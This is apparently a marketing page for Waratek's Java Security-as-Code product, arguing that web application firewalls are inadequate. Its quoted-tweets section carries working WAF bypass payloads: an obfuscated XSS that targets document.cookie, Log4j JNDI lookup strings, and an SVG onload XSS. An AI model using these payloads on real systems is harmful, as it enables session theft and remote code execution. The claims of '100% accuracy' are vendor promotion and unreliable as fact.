Is Your Current Tooling Helping You Scale?

Don't Make Us WAF

Who doesn't love the smell of hot regex in the morning? It's can be fun at times; even a little cathartic...

Until it's 3am and you're tuning the same rule for the 4th time.

We're not saying WAFs are bad. You need one to be SOC 2 compliant. But we are saying there's a better way.

What makes us WAF

WAFs focus on a lagging indicator

WAFs are essentially large data pipelines. They ingest, transform, and analyze HTTP request payloads to determine risk.

These payloads are a symptom of an action that are several steps removed from what's actually happening in the application.

Because of this lack of context, false positives and negatives happen.

WAFs lack proximity to fully secure apps

This lack of proximity allows for breaches and attacks from other angles as your only defense with a WAF is pattern matching.

When you perform security in the application layer, there's no gaps between your apps and the security provided.

Don't take our word for it

Cross Site Scripting (XSS) Akamai WAF Bypass try this payload : <!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27> urldecode <!--><svg onload='top[/al/.source+/ert/.source](document.cookie)'>
I hacked the biggest crypto exchange in indonesia && WAF Bypass https://youtube.com/watch?v=mDWu_g6d24o #bugbounty #sqlmap #SQLi
In this post, I will explain how I found a Blind XXE injection on PDF Generator that was vulnerable to CVE-2019-12154. However, in order to exfilftrate data, I had to bypass some WAF restrictions. #BugBounty https://t.co/cu2MgvEW0J
Log4j Cloudflare bypass : ${jndi:dns://aeutbj.example.com/ext} ${jndi:${lower:l}${lower:d}a${lower:p}://example.com/ other WAF :
Image
#CloudFlare #WAF bypassed using Rudolfo's ( @brutelogic) method, thank you for this payload, senhor. Payload: <Svg Only=1 OnLoad=confirm(1)> https://twitter.com/brutelogic/status/1495769940615442434?lang=en #bugbountytips #WAFBypass
Image Image

What's the solution?

Security-as-Code provides protection as your code executes for immutable, continuous security that protects from every directions, in every request, across all your apps.

Eliminate toil spent on false positives and negatives
Mitigate risk of vulnerability regressions after deployment
Secure COTS on-premise or in private and public clouds
Automate the remediation of code vulnerabilities

Waratek's Java Security Platform not only found the cryptominer we had, but securely removed it within 48 hours, stopping us from having to rebuild our solution from scratch.

Reliably protect applications at enterprise scale with immutable Security-as-Code

Security that's inseparable from the applications its protecting

When a vulnerable call is made, Waratek Secure performs a checksum check and tells your application to ingore the code.

A healthy version of the code is returned instead in real-time as defined by your policy.

Additional calls to that vulnerability fetches the sanitized version, resulting in even faster execution.

  • Decrease attack surface by securing the root of the target
  • Reduce risk with automatic policy enforcement on every request
  • Eliminate false positives & negatives by fixing vulnerable code

Publish changes to your security policy without redeploying apps

Accelerate time-to-remediate with instant security patches that take effect as your applications are running without needing to redeploy.

This approach to security reduces potential attacker dwell time to zero and keeps business continuity moving forward.

  • Reduce the time for security changes to take effect
  • Immutably protect against vulnerable injections in the CI/CD pipeline
  • Apply security constantly rather than at a single point in time

Declaratively secure every deployment and improve productivity

Enable immutable control through policy that allows developers to move fast without fear of vulnerability regression.

Every Declarative rule in your policy is immutable, meaning there's no code in the codebase now or in the future that can override the security defined in your policy.

  • Define a rule once & apply it to any code added in the future
  • Achieve 100% accuracy with zero false positives & negatives
  • Deploy new rules easily without redeploying applications

Ready to scale Security with modern software development?

Work with us to accelerate your adoption of Security-as-Code to deliver application security at scale.